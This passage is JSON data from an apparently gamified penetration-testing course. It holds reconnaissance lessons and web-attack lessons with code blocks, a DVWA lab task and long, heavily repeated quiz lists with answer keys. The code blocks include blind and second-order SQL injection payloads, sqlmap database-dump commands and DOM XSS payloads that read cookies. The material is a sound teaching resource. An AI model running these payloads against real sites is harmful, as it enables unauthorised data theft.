topology","Firewall rules"],"ans":1},{"type":"quiz","q":"nmap -O attempts to detect...","opts":["Open ports","Operating system","Output format","Obfuscation"],"ans":1},{"type":"quiz","q":"What is Google dorking?","opts":["Attacking Google","Using search operators to find exposed info","A DDoS technique","DNS enumeration"],"ans":1},{"type":"quiz","q":"theHarvester collects...","opts":["Malware samples","Emails, names, IPs from public sources","Exploit code","Network packets"],"ans":1},{"type":"quiz","q":"A /24 subnet has how many usable IPs?","opts":["24","256","254","128"],"ans":2},{"type":"quiz","q":"traceroute reveals...","opts":["Open ports","Network path (hops) to the target","Vulnerabilities","User accounts"],"ans":1},{"type":"quiz","q":"Which port is SSH?","opts":["21","22","23","25"],"ans":1},{"type":"quiz","q":"nmap -p- scans...","opts":["Top 1000 ports","All 65535 ports","Only UDP ports","Only TCP port 80"],"ans":1},{"type":"quiz","q":"What does WHOIS provide?","opts":["Website content","Domain registration info","Server vulnerabilities","Network speed"],"ans":1},{"type":"quiz","q":"What does nmap -sV do?","opts":["OS detection","Service version detection","Vulnerability scan","Stealth scan"],"ans":1},{"type":"quiz","q":"Passive recon means...","opts":["Scanning ports","Gathering info without touching the target","Running exploits","Social engineering"],"ans":1},{"type":"quiz","q":"Which DNS record type points to a mail server?","opts":["A","CNAME","MX","TXT"],"ans":2},{"type":"quiz","q":"Shodan indexes...","opts":["Web pages","Internet-connected devices and services","Social media","Dark web"],"ans":1},{"type":"quiz","q":"Banner grabbing reveals...","opts":["Passwords","Service software and version","Network topology","Firewall rules"],"ans":1},{"type":"quiz","q":"nmap -O detects...","opts":["Open ports","Operating system","Output format","Obfuscation"],"ans":1},{"type":"quiz","q":"What is Google dorking?","opts":["Attacking Google","Using search operators to find exposed info","DDoS","DNS enum"],"ans":1},{"type":"quiz","q":"A /24 subnet has how many usable IPs?","opts":["24","256","254","128"],"ans":2},{"type":"quiz","q":"Which port is SSH?","opts":["21","22","23","25"],"ans":1},{"type":"quiz","q":"nmap -p- scans...","opts":["Top 1000 ports","All 65535 ports","Only UDP","Only port 80"],"ans":1}]},{"id":"recon-threat-landscape","cat":"Reconnaissance","title":"Threat Landscape Analysis","diff":4,"xp":250,"intro":"Combine OSINT, dark web monitoring, and threat intel to assess organizational risk.","sections":[{"type":"text","content":"Go beyond technical recon: monitor dark web forums for data breaches, track industry-specific APT groups, assess the target's security maturity from public filings, and correlate with technical attack surface."},{"type":"code","lang":"bash","content":"# Dark web monitoring\n# Tools: Tor + manual forum searches, IntelX, SpiderFoot\nspiderfoot -s target.com -m all\n# Breach databases\nh8mail -t @target.com --breach-comp\n# APT tracking\n# MITRE ATT&CK groups page + industry vertical\n# Security maturity indicators:\n# - Bug bounty program? (HackerOne/Bugcrowd)\n# - SOC2/ISO27001 certified?\n# - Public incident history?"},{"type":"text","content":"Understanding recon data is as important as finding it. Every open port is a door, every leaked credential is a key. Think: what does this let me do next?"},{"type":"tip","content":"Document findings as you go: domains, IPs, emails, technologies, potential entry points. Good notes save hours."},{"type":"task","content":"Run a full recon workflow on a lab target: WHOIS, DNS, cert transparency, web archives. Document everything before any active scanning."},{"type":"quiz","q":"Threat landscape analysis combines...","opts":["Only port scanning","OSINT, dark web, threat intel, and security maturity assessment","Only vulnerability scanning","Only phishing"],"ans":1},{"type":"quiz","q":"Subdomain enumeration helps find...","opts":["Passwords","Hidden services and attack surface","Firewall rules","User accounts"],"ans":1},{"type":"quiz","q":"What does nmap -sV do?","opts":["OS detection","Service version detection","Vulnerability scan","Stealth scan"],"ans":1},{"type":"quiz","q":"Passive recon means...","opts":["Scanning ports","Gathering info without touching the target","Running exploits","Social engineering"],"ans":1},{"type":"quiz","q":"Which DNS record type points to a mail server?","opts":["A","CNAME","MX","TXT"],"ans":2},{"type":"quiz","q":"Shodan is best described as...","opts":["A vulnerability scanner","A search engine for internet-connected devices","A password cracker","An exploit framework"],"ans":1},{"type":"quiz","q":"What command shows DNS nameservers?","opts":["dig NS example.com","ping example.com","traceroute example.com","curl example.com"],"ans":0},{"type":"quiz","q":"Banner grabbing reveals...","opts":["User passwords","Service software and version","Network topology","Firewall rules"],"ans":1},{"type":"quiz","q":"nmap -O attempts to detect...","opts":["Open ports","Operating system","Output format","Obfuscation"],"ans":1},{"type":"quiz","q":"What is Google dorking?","opts":["Attacking Google","Using search operators to find exposed info","A DDoS technique","DNS enumeration"],"ans":1},{"type":"quiz","q":"theHarvester collects...","opts":["Malware samples","Emails, names, IPs from public sources","Exploit code","Network packets"],"ans":1},{"type":"quiz","q":"A /24 subnet has how many usable IPs?","opts":["24","256","254","128"],"ans":2},{"type":"quiz","q":"traceroute reveals...","opts":["Open ports","Network path (hops) to the target","Vulnerabilities","User accounts"],"ans":1},{"type":"quiz","q":"Which port is SSH?","opts":["21","22","23","25"],"ans":1},{"type":"quiz","q":"nmap -p- scans...","opts":["Top 1000 ports","All 65535 ports","Only UDP ports","Only TCP port 80"],"ans":1},{"type":"quiz","q":"What does nmap -sV do?","opts":["OS detection","Service version detection","Vulnerability scan","Stealth scan"],"ans":1},{"type":"quiz","q":"Passive recon means...","opts":["Scanning ports","Gathering info without touching the target","Running exploits","Social engineering"],"ans":1},{"type":"quiz","q":"Which DNS record type points to a mail server?","opts":["A","CNAME","MX","TXT"],"ans":2},{"type":"quiz","q":"Shodan indexes...","opts":["Web pages","Internet-connected devices and services","Social media","Dark web"],"ans":1},{"type":"quiz","q":"Banner grabbing reveals...","opts":["Passwords","Service software and version","Network topology","Firewall rules"],"ans":1},{"type":"quiz","q":"nmap -O detects...","opts":["Open ports","Operating system","Output format","Obfuscation"],"ans":1},{"type":"quiz","q":"What is Google dorking?","opts":["Attacking Google","Using search operators to find exposed info","DDoS","DNS enum"],"ans":1},{"type":"quiz","q":"A /24 subnet has how many usable IPs?","opts":["24","256","254","128"],"ans":2},{"type":"quiz","q":"Which port is SSH?","opts":["21","22","23","25"],"ans":1},{"type":"quiz","q":"nmap -p- scans...","opts":["Top 1000 ports","All 65535 ports","Only UDP","Only port 80"],"ans":1}]},{"id":"recon-covert-infra","cat":"Reconnaissance","title":"Covert Infrastructure Discovery","diff":4,"xp":300,"intro":"Find attacker infrastructure: C2 servers, phishing domains, and staging hosts.","sections":[{"type":"text","content":"Pivot from IOCs to find the attacker's full infrastructure: reverse DNS of C2 IPs, SSL cert similarity, WHOIS patterns, hosting provider analysis, and passive DNS historical records."},{"type":"code","lang":"bash","content":"# Pivot from a known C2 IP\n# Passive DNS history\ncurl -s https://api.securitytrails.com/v1/domain/evil.com/history/dns/a -H 'apikey: KEY'\n# SSL cert fingerprint pivot\ncensys search 'services.tls.certificates.leaf.fingerprint_sha256:HASH'\n# WHOIS pivot (same registrant across domains)\nwhois evil1.com | grep 'Registrant'\n# VirusTotal relations\ncurl -s 'https://www.virustotal.com/api/v3/ip_addresses/1.2.3.4/resolutions' -H 'x-apikey: KEY'"},{"type":"text","content":"Understanding recon data is as important as finding it. Every open port is a door, every leaked credential is a key. Think: what does this let me do next?"},{"type":"tip","content":"Document findings as you go: domains, IPs, emails, technologies, potential entry points. Good notes save hours."},{"type":"task","content":"Run a full recon workflow on a lab target: WHOIS, DNS, cert transparency, web archives. Document everything before any active scanning."},{"type":"quiz","q":"Infrastructure pivoting starts from...","opts":["A random IP","A known IOC (IP, domain, hash) and expands outward","A Google search","A social media post"],"ans":1},{"type":"quiz","q":"What does nmap -sV do?","opts":["OS detection","Service version detection","Vulnerability scan","Stealth scan"],"ans":1},{"type":"quiz","q":"Passive recon means...","opts":["Scanning ports","Gathering info without touching the target","Running exploits","Social engineering"],"ans":1},{"type":"quiz","q":"Which DNS record type points to a mail server?","opts":["A","CNAME","MX","TXT"],"ans":2},{"type":"quiz","q":"Shodan is best described as...","opts":["A vulnerability scanner","A search engine for internet-connected devices","A password cracker","An exploit framework"],"ans":1},{"type":"quiz","q":"What command shows DNS nameservers?","opts":["dig NS example.com","ping example.com","traceroute example.com","curl example.com"],"ans":0},{"type":"quiz","q":"Banner grabbing reveals...","opts":["User passwords","Service software and version","Network topology","Firewall rules"],"ans":1},{"type":"quiz","q":"nmap -O attempts to detect...","opts":["Open ports","Operating system","Output format","Obfuscation"],"ans":1},{"type":"quiz","q":"What is Google dorking?","opts":["Attacking Google","Using search operators to find exposed info","A DDoS technique","DNS enumeration"],"ans":1},{"type":"quiz","q":"theHarvester collects...","opts":["Malware samples","Emails, names, IPs from public sources","Exploit code","Network packets"],"ans":1},{"type":"quiz","q":"A /24 subnet has how many usable IPs?","opts":["24","256","254","128"],"ans":2},{"type":"quiz","q":"traceroute reveals...","opts":["Open ports","Network path (hops) to the target","Vulnerabilities","User accounts"],"ans":1},{"type":"quiz","q":"Which port is SSH?","opts":["21","22","23","25"],"ans":1},{"type":"quiz","q":"nmap -p- scans...","opts":["Top 1000 ports","All 65535 ports","Only UDP ports","Only TCP port 80"],"ans":1},{"type":"quiz","q":"What does WHOIS provide?","opts":["Website content","Domain registration info","Server vulnerabilities","Network speed"],"ans":1},{"type":"quiz","q":"What does nmap -sV do?","opts":["OS detection","Service version detection","Vulnerability scan","Stealth scan"],"ans":1},{"type":"quiz","q":"Passive recon means...","opts":["Scanning ports","Gathering info without touching the target","Running exploits","Social engineering"],"ans":1},{"type":"quiz","q":"Which DNS record type points to a mail server?","opts":["A","CNAME","MX","TXT"],"ans":2},{"type":"quiz","q":"Shodan indexes...","opts":["Web pages","Internet-connected devices and services","Social media","Dark web"],"ans":1},{"type":"quiz","q":"Banner grabbing reveals...","opts":["Passwords","Service software and version","Network topology","Firewall rules"],"ans":1},{"type":"quiz","q":"nmap -O detects...","opts":["Open ports","Operating system","Output format","Obfuscation"],"ans":1},{"type":"quiz","q":"What is Google dorking?","opts":["Attacking Google","Using search operators to find exposed info","DDoS","DNS enum"],"ans":1},{"type":"quiz","q":"A /24 subnet has how many usable IPs?","opts":["24","256","254","128"],"ans":2},{"type":"quiz","q":"Which port is SSH?","opts":["21","22","23","25"],"ans":1},{"type":"quiz","q":"nmap -p- scans...","opts":["Top 1000 ports","All 65535 ports","Only UDP","Only port 80"],"ans":1}]},{"id":"recon-full-scope-assessment","cat":"Reconnaissance","title":"Full Scope Assessment: External to Internal","diff":5,"xp":300,"intro":"Conduct a complete external assessment from zero knowledge to internal network map.","sections":[{"type":"text","content":"Real engagement: start with just a company name. Map external attack surface (domains, IPs, cloud), identify entry points, validate vulnerabilities, and build a prioritized attack plan before a single exploit runs."},{"type":"code","lang":"bash","content":"# Phase 1: Passive (2-3 days)\n# OSINT, employee enum, tech stack, breach data\n# Phase 2: Semi-passive (1 day)\n# DNS enum, cert transparency, cloud discovery\n# Phase 3: Active (1-2 days)\n# Port scanning, service fingerprinting, vuln scanning\n# Phase 4: Analysis\n# Correlate findings, identify attack paths\n# Prioritize: internet-facing + vulnerable + high-impact\n# Deliverable: attack plan with risk-ranked entry points"},{"type":"text","content":"Understanding recon data is as important as finding it. Every open port is a door, every leaked credential is a key. Think: what does this let me do next?"},{"type":"tip","content":"Document findings as you go: domains, IPs, emails, technologies, potential entry points. Good notes save hours."},{"type":"task","content":"Run a full recon workflow on a lab target: WHOIS, DNS, cert transparency, web archives. Document everything before any active scanning."},{"type":"quiz","q":"A full scope assessment starts with...","opts":["Running Metasploit","Just a company name and builds complete understanding","Internal network access","A vulnerability scan"],"ans":1},{"type":"quiz","q":"What does nmap -sV do?","opts":["OS detection","Service version detection","Vulnerability scan","Stealth scan"],"ans":1},{"type":"quiz","q":"Passive recon means...","opts":["Scanning ports","Gathering info without touching the target","Running exploits","Social engineering"],"ans":1},{"type":"quiz","q":"Which DNS record type points to a mail server?","opts":["A","CNAME","MX","TXT"],"ans":2},{"type":"quiz","q":"Shodan is best described as...","opts":["A vulnerability scanner","A search engine for internet-connected devices","A password cracker","An exploit framework"],"ans":1},{"type":"quiz","q":"What command shows DNS nameservers?","opts":["dig NS example.com","ping example.com","traceroute example.com","curl example.com"],"ans":0},{"type":"quiz","q":"Banner grabbing reveals...","opts":["User passwords","Service software and version","Network topology","Firewall rules"],"ans":1},{"type":"quiz","q":"nmap -O attempts to detect...","opts":["Open ports","Operating system","Output format","Obfuscation"],"ans":1},{"type":"quiz","q":"What is Google dorking?","opts":["Attacking Google","Using search operators to find exposed info","A DDoS technique","DNS enumeration"],"ans":1},{"type":"quiz","q":"theHarvester collects...","opts":["Malware samples","Emails, names, IPs from public sources","Exploit code","Network packets"],"ans":1},{"type":"quiz","q":"A /24 subnet has how many usable IPs?","opts":["24","256","254","128"],"ans":2},{"type":"quiz","q":"traceroute reveals...","opts":["Open ports","Network path (hops) to the target","Vulnerabilities","User accounts"],"ans":1},{"type":"quiz","q":"Which port is SSH?","opts":["21","22","23","25"],"ans":1},{"type":"quiz","q":"nmap -p- scans...","opts":["Top 1000 ports","All 65535 ports","Only UDP ports","Only TCP port 80"],"ans":1},{"type":"quiz","q":"What does WHOIS provide?","opts":["Website content","Domain registration info","Server vulnerabilities","Network speed"],"ans":1},{"type":"quiz","q":"What does nmap -sV do?","opts":["OS detection","Service version detection","Vulnerability scan","Stealth scan"],"ans":1},{"type":"quiz","q":"Passive recon means...","opts":["Scanning ports","Gathering info without touching the target","Running exploits","Social engineering"],"ans":1},{"type":"quiz","q":"Which DNS record type points to a mail server?","opts":["A","CNAME","MX","TXT"],"ans":2},{"type":"quiz","q":"Shodan indexes...","opts":["Web pages","Internet-connected devices and services","Social media","Dark web"],"ans":1},{"type":"quiz","q":"Banner grabbing reveals...","opts":["Passwords","Service software and version","Network topology","Firewall rules"],"ans":1},{"type":"quiz","q":"nmap -O detects...","opts":["Open ports","Operating system","Output format","Obfuscation"],"ans":1},{"type":"quiz","q":"What is Google dorking?","opts":["Attacking Google","Using search operators to find exposed info","DDoS","DNS enum"],"ans":1},{"type":"quiz","q":"A /24 subnet has how many usable IPs?","opts":["24","256","254","128"],"ans":2},{"type":"quiz","q":"Which port is SSH?","opts":["21","22","23","25"],"ans":1},{"type":"quiz","q":"nmap -p- scans...","opts":["Top 1000 ports","All 65535 ports","Only UDP","Only port 80"],"ans":1}]},{"id":"web-sqli-blind-boolean","cat":"Web Application","title":"Blind Boolean-Based SQL Injection","diff":2,"xp":150,"intro":"Extract data one bit at a time when the app shows no errors.","sections":[{"type":"text","content":"When the app doesn't display query results or errors, use boolean conditions to ask yes/no questions. Different page responses (content, length, status) reveal the answer."},{"type":"code","lang":"bash","content":"# Boolean-based blind SQLi\n# True condition: page loads normally\n?id=1 AND 1=1--\n# False condition: page is different\n?id=1 AND 1=2--\n# Extract data character by character\n?id=1 AND SUBSTRING(@@version,1,1)='5'--\n?id=1 AND (SELECT LENGTH(password) FROM users LIMIT 1)=32--\n# Automate with sqlmap\nsqlmap -u 'http://target.com/?id=1' --technique=B --dump"},{"type":"text","content":"Web vulnerabilities exist because developers trust user input. Every form field, URL parameter, and header is a potential injection point. Find where user data meets processing without validation."},{"type":"tip","content":"Use the app as a regular user first. Map every feature and endpoint. The best bugs come from understanding business logic, not just throwing payloads."},{"type":"task","content":"Set up DVWA locally. For each vulnerability type, start at the lowest security level and work up. Write down WHY each defense blocks your payload."},{"type":"quiz","q":"Boolean-based blind SQLi determines data by...","opts":["Reading error messages","Comparing page responses for true vs false conditions","Timing differences","Direct output"],"ans":1},{"type":"quiz","q":"SQL injection targets...","opts":["The web server OS","Database queries","JavaScript engine","CSS rendering"],"ans":1},{"type":"quiz","q":"XSS allows an attacker to...","opts":["Crash the server","Execute scripts in other users' browsers","Access the database directly","Bypass the firewall"],"ans":1},{"type":"quiz","q":"CSRF tricks the victim into...","opts":["Downloading malware","Making unintended requests while authenticated","Revealing their password","Opening a malicious file"],"ans":1},{"type":"quiz","q":"What HTTP status code means 'Not Found'?","opts":["200","301","403","404"],"ans":3},{"type":"quiz","q":"Burp Suite is primarily used for...","opts":["Network scanning","Web application testing (proxy/scanner)","Password cracking","Malware analysis"],"ans":1},{"type":"quiz","q":"Content-Security-Policy header prevents...","opts":["SQL injection","Cross-site scripting (XSS)","CSRF","SSRF"],"ans":1},{"type":"quiz","q":"An HTTP 500 error indicates...","opts":["Client error","Redirect","Server-side error","Authentication required"],"ans":2},{"type":"quiz","q":"Same-Origin Policy restricts...","opts":["Server-to-server requests","Browser cross-origin JavaScript access","DNS queries","File uploads"],"ans":1},{"type":"quiz","q":"Directory traversal uses...","opts":["SQL keywords","../ sequences to access files outside web root","JavaScript injection","HTTP methods"],"ans":1},{"type":"quiz","q":"What tool intercepts HTTP requests?","opts":["nmap","Burp Suite / mitmproxy","hashcat","Metasploit"],"ans":1},{"type":"quiz","q":"A secure cookie should have which flags?","opts":["Secure, HttpOnly, SameSite","Public, Readable, Global","Debug, Verbose, Trace","None needed"],"ans":0},{"type":"quiz","q":"What is the default HTTP port?","opts":["443","8080","22","80"],"ans":3},{"type":"quiz","q":"Parameterized queries prevent...","opts":["XSS","SQL injection","CSRF","Clickjacking"],"ans":1},{"type":"quiz","q":"What does robots.txt reveal?","opts":["Passwords","Directories the site wants hidden from crawlers","Vulnerabilities","API keys"],"ans":1},{"type":"quiz","q":"SQL injection targets...","opts":["The OS","Database queries","JavaScript","CSS"],"ans":1},{"type":"quiz","q":"XSS executes scripts in...","opts":["The server","Other users' browsers","The database","The firewall"],"ans":1},{"type":"quiz","q":"CSRF tricks victims into...","opts":["Downloading malware","Making unintended authenticated requests","Revealing passwords","Opening files"],"ans":1},{"type":"quiz","q":"HTTP 404 means...","opts":["OK","Redirect","Forbidden","Not Found"],"ans":3},{"type":"quiz","q":"Burp Suite is for...","opts":["Network scanning","Web application testing","Password cracking","Malware analysis"],"ans":1},{"type":"quiz","q":"CSP prevents...","opts":["SQL injection","Cross-site scripting","CSRF","SSRF"],"ans":1},{"type":"quiz","q":"HTTP 500 indicates...","opts":["Client error","Redirect","Server error","Auth required"],"ans":2},{"type":"quiz","q":"Same-Origin Policy restricts...","opts":["Server requests","Cross-origin JavaScript access","DNS queries","Uploads"],"ans":1},{"type":"quiz","q":"Directory traversal uses...","opts":["SQL","../ sequences","JavaScript","HTTP methods"],"ans":1},{"type":"quiz","q":"Parameterized queries prevent...","opts":["XSS","SQL injection","CSRF","Clickjacking"],"ans":1}]},{"id":"web-sqli-time-based","cat":"Web Application","title":"Time-Based Blind SQL Injection","diff":3,"xp":200,"intro":"When even boolean differences are hidden, use time delays.","sections":[{"type":"text","content":"If the page looks identical for true/false, inject a conditional time delay. A 5-second response means 'true', instant means 'false'."},{"type":"code","lang":"bash","content":"# Time-based blind SQLi\n?id=1; IF(1=1) WAITFOR DELAY '0:0:5'--  # MSSQL\n?id=1 AND IF(1=1,SLEEP(5),0)--  # MySQL\n?id=1; SELECT CASE WHEN (1=1) THEN pg_sleep(5) ELSE pg_sleep(0) END--  # PostgreSQL\n# Extract version first char\n?id=1 AND IF(SUBSTRING(@@version,1,1)='5',SLEEP(5),0)--\n# sqlmap\nsqlmap -u 'http://target.com/?id=1' --technique=T"},{"type":"text","content":"Web vulnerabilities exist because developers trust user input. Every form field, URL parameter, and header is a potential injection point. Find where user data meets processing without validation."},{"type":"tip","content":"Use the app as a regular user first. Map every feature and endpoint. The best bugs come from understanding business logic, not just throwing payloads."},{"type":"task","content":"Set up DVWA locally. For each vulnerability type, start at the lowest security level and work up. Write down WHY each defense blocks your payload."},{"type":"quiz","q":"Time-based blind SQLi uses...","opts":["Error messages","Conditional time delays to infer data","Page content differences","HTTP status codes"],"ans":1},{"type":"quiz","q":"HTTPS encrypts traffic using...","opts":["SSH","TLS/SSL","IPSec","WPA"],"ans":1},{"type":"quiz","q":"SQL injection targets...","opts":["The web server OS","Database queries","JavaScript engine","CSS rendering"],"ans":1},{"type":"quiz","q":"XSS allows an attacker to...","opts":["Crash the server","Execute scripts in other users' browsers","Access the database directly","Bypass the firewall"],"ans":1},{"type":"quiz","q":"CSRF tricks the victim into...","opts":["Downloading malware","Making unintended requests while authenticated","Revealing their password","Opening a malicious file"],"ans":1},{"type":"quiz","q":"What HTTP status code means 'Not Found'?","opts":["200","301","403","404"],"ans":3},{"type":"quiz","q":"Burp Suite is primarily used for...","opts":["Network scanning","Web application testing (proxy/scanner)","Password cracking","Malware analysis"],"ans":1},{"type":"quiz","q":"Content-Security-Policy header prevents...","opts":["SQL injection","Cross-site scripting (XSS)","CSRF","SSRF"],"ans":1},{"type":"quiz","q":"An HTTP 500 error indicates...","opts":["Client error","Redirect","Server-side error","Authentication required"],"ans":2},{"type":"quiz","q":"Same-Origin Policy restricts...","opts":["Server-to-server requests","Browser cross-origin JavaScript access","DNS queries","File uploads"],"ans":1},{"type":"quiz","q":"Directory traversal uses...","opts":["SQL keywords","../ sequences to access files outside web root","JavaScript injection","HTTP methods"],"ans":1},{"type":"quiz","q":"What tool intercepts HTTP requests?","opts":["nmap","Burp Suite / mitmproxy","hashcat","Metasploit"],"ans":1},{"type":"quiz","q":"A secure cookie should have which flags?","opts":["Secure, HttpOnly, SameSite","Public, Readable, Global","Debug, Verbose, Trace","None needed"],"ans":0},{"type":"quiz","q":"What is the default HTTP port?","opts":["443","8080","22","80"],"ans":3},{"type":"quiz","q":"Parameterized queries prevent...","opts":["XSS","SQL injection","CSRF","Clickjacking"],"ans":1},{"type":"quiz","q":"SQL injection targets...","opts":["The OS","Database queries","JavaScript","CSS"],"ans":1},{"type":"quiz","q":"XSS executes scripts in...","opts":["The server","Other users' browsers","The database","The firewall"],"ans":1},{"type":"quiz","q":"CSRF tricks victims into...","opts":["Downloading malware","Making unintended authenticated requests","Revealing passwords","Opening files"],"ans":1},{"type":"quiz","q":"HTTP 404 means...","opts":["OK","Redirect","Forbidden","Not Found"],"ans":3},{"type":"quiz","q":"Burp Suite is for...","opts":["Network scanning","Web application testing","Password cracking","Malware analysis"],"ans":1},{"type":"quiz","q":"CSP prevents...","opts":["SQL injection","Cross-site scripting","CSRF","SSRF"],"ans":1},{"type":"quiz","q":"HTTP 500 indicates...","opts":["Client error","Redirect","Server error","Auth required"],"ans":2},{"type":"quiz","q":"Same-Origin Policy restricts...","opts":["Server requests","Cross-origin JavaScript access","DNS queries","Uploads"],"ans":1},{"type":"quiz","q":"Directory traversal uses...","opts":["SQL","../ sequences","JavaScript","HTTP methods"],"ans":1},{"type":"quiz","q":"Parameterized queries prevent...","opts":["XSS","SQL injection","CSRF","Clickjacking"],"ans":1}]},{"id":"web-sqli-second-order","cat":"Web Application","title":"Second-Order SQL Injection","diff":3,"xp":250,"intro":"Inject now, trigger later \u2014 the payload activates in a different context.","sections":[{"type":"text","content":"The injection is stored (e.g., in a username during registration) and triggers later when a different function uses that stored value in a query without sanitization."},{"type":"code","lang":"bash","content":"# Register with SQLi payload as username:\nUsername: admin'--\n# Later, when the app does:\n# SELECT * FROM users WHERE username = '$stored_username'\n# It becomes:\n# SELECT * FROM users WHERE username = 'admin'--'\n# The trailing -- comments out the rest\n\n# Or password reset that uses stored email:\n# UPDATE users SET password='new' WHERE email='stored_payload'"},{"type":"text","content":"Web vulnerabilities exist because developers trust user input. Every form field, URL parameter, and header is a potential injection point. Find where user data meets processing without validation."},{"type":"tip","content":"Use the app as a regular user first. Map every feature and endpoint. The best bugs come from understanding business logic, not just throwing payloads."},{"type":"task","content":"Set up DVWA locally. For each vulnerability type, start at the lowest security level and work up. Write down WHY each defense blocks your payload."},{"type":"quiz","q":"Second-order SQLi is harder to find because...","opts":["It uses encryption","The injection and trigger happen in different requests/functions","It only works on old databases","It requires admin access"],"ans":1},{"type":"quiz","q":"What does robots.txt reveal?","opts":["Passwords","Directories the site wants hidden from crawlers","Vulnerabilities","API keys"],"ans":1},{"type":"quiz","q":"HTTPS encrypts traffic using...","opts":["SSH","TLS/SSL","IPSec","WPA"],"ans":1},{"type":"quiz","q":"SQL injection targets...","opts":["The web server OS","Database queries","JavaScript engine","CSS rendering"],"ans":1},{"type":"quiz","q":"XSS allows an attacker to...","opts":["Crash the server","Execute scripts in other users' browsers","Access the database directly","Bypass the firewall"],"ans":1},{"type":"quiz","q":"CSRF tricks the victim into...","opts":["Downloading malware","Making unintended requests while authenticated","Revealing their password","Opening a malicious file"],"ans":1},{"type":"quiz","q":"What HTTP status code means 'Not Found'?","opts":["200","301","403","404"],"ans":3},{"type":"quiz","q":"Burp Suite is primarily used for...","opts":["Network scanning","Web application testing (proxy/scanner)","Password cracking","Malware analysis"],"ans":1},{"type":"quiz","q":"Content-Security-Policy header prevents...","opts":["SQL injection","Cross-site scripting (XSS)","CSRF","SSRF"],"ans":1},{"type":"quiz","q":"An HTTP 500 error indicates...","opts":["Client error","Redirect","Server-side error","Authentication required"],"ans":2},{"type":"quiz","q":"Same-Origin Policy restricts...","opts":["Server-to-server requests","Browser cross-origin JavaScript access","DNS queries","File uploads"],"ans":1},{"type":"quiz","q":"Directory traversal uses...","opts":["SQL keywords","../ sequences to access files outside web root","JavaScript injection","HTTP methods"],"ans":1},{"type":"quiz","q":"What tool intercepts HTTP requests?","opts":["nmap","Burp Suite / mitmproxy","hashcat","Metasploit"],"ans":1},{"type":"quiz","q":"A secure cookie should have which flags?","opts":["Secure, HttpOnly, SameSite","Public, Readable, Global","Debug, Verbose, Trace","None needed"],"ans":0},{"type":"quiz","q":"What is the default HTTP port?","opts":["443","8080","22","80"],"ans":3},{"type":"quiz","q":"SQL injection targets...","opts":["The OS","Database queries","JavaScript","CSS"],"ans":1},{"type":"quiz","q":"XSS executes scripts in...","opts":["The server","Other users' browsers","The database","The firewall"],"ans":1},{"type":"quiz","q":"CSRF tricks victims into...","opts":["Downloading malware","Making unintended authenticated requests","Revealing passwords","Opening files"],"ans":1},{"type":"quiz","q":"HTTP 404 means...","opts":["OK","Redirect","Forbidden","Not Found"],"ans":3},{"type":"quiz","q":"Burp Suite is for...","opts":["Network scanning","Web application testing","Password cracking","Malware analysis"],"ans":1},{"type":"quiz","q":"CSP prevents...","opts":["SQL injection","Cross-site scripting","CSRF","SSRF"],"ans":1},{"type":"quiz","q":"HTTP 500 indicates...","opts":["Client error","Redirect","Server error","Auth required"],"ans":2},{"type":"quiz","q":"Same-Origin Policy restricts...","opts":["Server requests","Cross-origin JavaScript access","DNS queries","Uploads"],"ans":1},{"type":"quiz","q":"Directory traversal uses...","opts":["SQL","../ sequences","JavaScript","HTTP methods"],"ans":1},{"type":"quiz","q":"Parameterized queries prevent...","opts":["XSS","SQL injection","CSRF","Clickjacking"],"ans":1}]},{"id":"web-xss-dom-advanced","cat":"Web Application","title":"DOM-Based XSS Advanced Techniques","diff":3,"xp":200,"intro":"Exploit client-side JavaScript that processes URL fragments and user input.","sections":[{"type":"text","content":"DOM XSS happens entirely in the browser. The server never sees the payload. Sources (location.hash, document.URL, postMessage) flow into sinks (innerHTML, eval, document.write)."},{"type":"code","lang":"javascript","content":"// Source: URL fragment\n// http://target.com/#<img src=x onerror=alert(1)>\n\n// Vulnerable code:\ndocument.getElementById('output').innerHTML = location.hash.slice(1);\n\n// Source: postMessage\nwindow.addEventListener('message', (e) => {\n  document.getElementById('widget').innerHTML = e.data; // sink!\n});\n\n// Attack: from attacker page\ntarget_window.postMessage('<img src=x onerror=alert(document.cookie)>', '*');"},{"type":"text","content":"Web vulnerabilities exist because developers trust user input. Every form field, URL parameter, and header is a potential injection point. Find where user data meets processing without validation."},{"type":"tip","content":"Use the app as a regular user first. Map every feature and endpoint. The best bugs come from understanding business logic, not just throwing payloads."},{"type":"task","content":"Set up DVWA locally. For each vulnerability type, start at the lowest security level and work up. Write down WHY each defense blocks your payload."},{"type":"quiz","q":"DOM XSS is different because...","opts":["It's server-side","The payload never reaches the server (client-side only)","It requires SQL","It uses encryption"],"ans":1},{"type":"quiz","q":"Parameterized queries prevent...","opts":["XSS","SQL injection","CSRF","Clickjacking"],"ans":1},{"type":"quiz","q":"What does robots.txt reveal?","opts":["Passwords","Directories the site wants hidden from crawlers","Vulnerabilities","API keys"],"ans":1},{"type":"quiz","q":"HTTPS encrypts traffic using...","opts":["SSH","TLS/SSL","IPSec","WPA"],"ans":1},{"type":"quiz","q":"SQL injection targets...","opts":["The web server OS","Database queries","JavaScript engine","CSS rendering"],"ans":1},{"type":"quiz","q":"XSS allows an attacker to...","opts":["Crash the server","Execute scripts in other users' browsers","Access the database directly","Bypass the firewall"],"ans":1},{"type":"quiz","q":"CSRF tricks the victim into...","opts":["Downloading malware","Making unintended requests while authenticated","Revealing their password","Opening a malicious file"],"ans":1},{"type":"quiz","q":"What HTTP status code means 'Not Found'?","opts":["200","301","403","404"],"ans":3},{"type":"quiz","q":"Burp Suite is primarily used for...","opts":["Network scanning","Web application testing (proxy/scanner)","Password cracking","Malware analysis"],"ans":1},{"type":"quiz","q":"Content-Security-Policy header prevents...","opts":["SQL injection","Cross-site scripting (XSS)","CSRF","SSRF"],"ans":1},{"type":"quiz","q":"An HTTP 500 error indicates...","opts":["Client error","Redirect","Server-side error","Authentication required"],"ans":2},{"type":"quiz","q":"Same-Origin Policy restricts...","opts":["Server-to-server requests","Browser cross-origin JavaScript access","DNS queries","File uploads"],"ans":1},{"type":"quiz","q":"Directory traversal uses...","opts":["SQL keywords","../ sequences to access files outside web root","JavaScript injection","HTTP methods"],"ans":1},{"type":"quiz","q":"What tool intercepts HTTP requests?","opts":["nmap","Burp Suite / mitmproxy","hashcat","Metasploit"],"ans":1},{"type":"quiz","q":"A secure cookie should have which flags?","opts":["Secure, HttpOnly, SameSite","Public, Readable, Global","Debug, Verbose, Trace","None needed"],"ans":0},{"type":"quiz","q":"SQL injection targets...","opts":["The OS","Database queries","JavaScript","CSS"],"ans":1},{"type":"quiz","q":"XSS executes scripts in...","opts":["The server","Other users' browsers","The database","The firewall"],"ans":1},{"type":"quiz","q":"CSRF tricks victims into...","opts":["Downloading malware","Making unintended authenticated requests","Revealing passwords","Opening 